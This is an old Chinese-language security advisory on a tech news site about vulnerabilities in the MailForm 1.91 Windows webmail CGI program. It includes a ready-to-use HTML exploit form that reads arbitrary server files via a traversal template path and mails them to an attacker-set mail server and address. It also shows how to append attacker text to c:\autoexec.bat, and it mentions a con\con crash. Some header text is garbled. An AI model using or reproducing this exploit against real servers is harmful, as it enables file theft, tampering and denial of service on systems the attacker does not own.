首页产品库评测行情新闻|手机数码笔记本台式机DIY硬件数字家庭数码相机办公外设|软件下载游戏开发|社区

更多

数码相机
MP4
LCD
机箱
音箱

天极网 > 软件频道 > 网络安全频道 >MailForm 1.91的系列漏洞

MailForm 1.91的系列漏洞

2000-05-22 00:00作者:安络出处:不详责任编辑:

婕俺绦颍?
MailForm v1.91 For Windows9x&NT

描述
Mailform V1.91有一些参数允许恶意用户利用而入侵系统

详细
MailForm是一个常用的webmail程序,国内一些ICP也有采用。
这个程序的系列参数允许入侵者危及系统,危害:DOS、读写硬盘文件、上传文件、甚至完全控制整个系统

有问题的参数:
_1_TextLog - 允许写文件
_1_HTMLLog - 允许写文件
_1_MailTemplate - 允许获取文件
_1_INIFile - 可能危险
_1_MailServer - 可以将这个值设置为攻击者的地址
_1_MailTo - 发送邮件


Its fairly obvious where the problem lies here. We can specify any
file to send + the POP server to send it to. The con\con bug may also
be used to bring down the entire system. Template files will be cut
off at the first null character, so retrieving of binaries is not
practical. Trying to retrieve certain files will cause MailForm to
crash.
1、攻击者可以通过发送邮件的方式,把系统上的任何文件发送到自己的邮箱;
2、可以使用windows9x的虚拟设备解析漏洞导致系统当机


下面是构造好的 html(可以在任何一台在线的 web 服务器上构造这种html文件),允许攻击者下载任何文件:
---------------------------------------------------cut here-----------------------------------
$#@60;html$#@62;
$#@60;title$#@62;Web interface for MailForm vulnerabilities.$#@60;/title$#@62;
$#@60;/head$#@62;
如果发现 "Form submission failed" 的提示,不要担心,这是正常的。在下面,有些参数必须修改,这取决于你要攻击的主机。
$#@60;br$#@62;
$#@60;br$#@62;
Download file:$#@60;br$#@62;
$#@60;body bgcolor="#FFFFFF"$#@62;

$#@60;form method="POST" action="http://www.xxx.com/cgi-bin/mailform.exe"$#@62;
$#@60;input type="text" name="_1_MailServer" value="yourhost"$#@62;$#@60;br$#@62;
$#@60;input type="text" name="_1_MailTemplate" value="..\xitami.aut"$#@62;$#@60;br$#@62;
$#@60;input type="hidden" size="30" name="_1_MailTo" value="me@isp.com"$#@62;
$#@60 put type="hidden" size="40" name="Name" value="me"$#@62;
$#@60;input type="submit" value="Send" name="_2_Submit"$#@62;
$#@60;/form$#@62;
$#@60;br$#@62;
Append to file:$#@60;br$#@62;
Note: your text will be preceeded by garbage.$#@60;br$#@62;
$#@60;body bgcolor="#FFFFFF"$#@62;
$#@60;form method="POST" action="http://www.xxx.com/cgi-bin/mailform.exe"$#@62;
$#@60;input type="hidden" name="_1_MailServer" value="x"$#@62;
$#@60;input type="hidden" name="_1_MailTemplate" value="nul"$#@62;
$#@60;input type="text" name="_1_TextLog" size="40" value="c:\autoexec.bat"$#@62;$#@60;br$#@62;
$#@60;input type="hidden" size="30" name="_1_MailTo" value="me@isp.com "$#@62;
$#@60;textarea name="Name" rows="4" cols="40"$#@62;$#@60;/textarea$#@62;
$#@60;br$#@62;$#@60;input type="submit" value="Send" name="_2_Submit"$#@62;
$#@60;/form$#@62;
$#@60;/body$#@62;
$#@60;/html$#@62;
---------------------------------------------------cut here-------------------------
这将把 c:\autoexec.bat 发送到 me@isp.com

这只是通过form发送邮件而读取硬盘文件的一个示范,更多的功能如上载文件、执行指令,也可以做到,在这里暂时不公布具体方法。

解决方案
禁用 MailForm

关注此文的读者还看过:

返回软件频道首页

软件频道最新更新

热点推荐

IT嘉年华

编辑推荐

热门
推荐

网友关注

软件
资料
游戏

文章排行

本周
本月
最新更新
天极服务| 关于我们| About us| 网站律师| 电子杂志| RSS订阅| 友情合作| 加入我们| 网站地图| MSN/QQ上看天极
TMG
Copyright (C) 1999-2009 Yesky.com, All Rights Reserved
版权所有 天极网络
商务联系、网站内容、合作建议:010-82657868 在线提交意见反馈
渝ICP证B2-20030003号  通用网址:天极网
天极传媒:天极网|比特网|IT专家网|IT商网|52PK游戏网|IT分众
经营性网站备案信息 网警备案 中国网站排名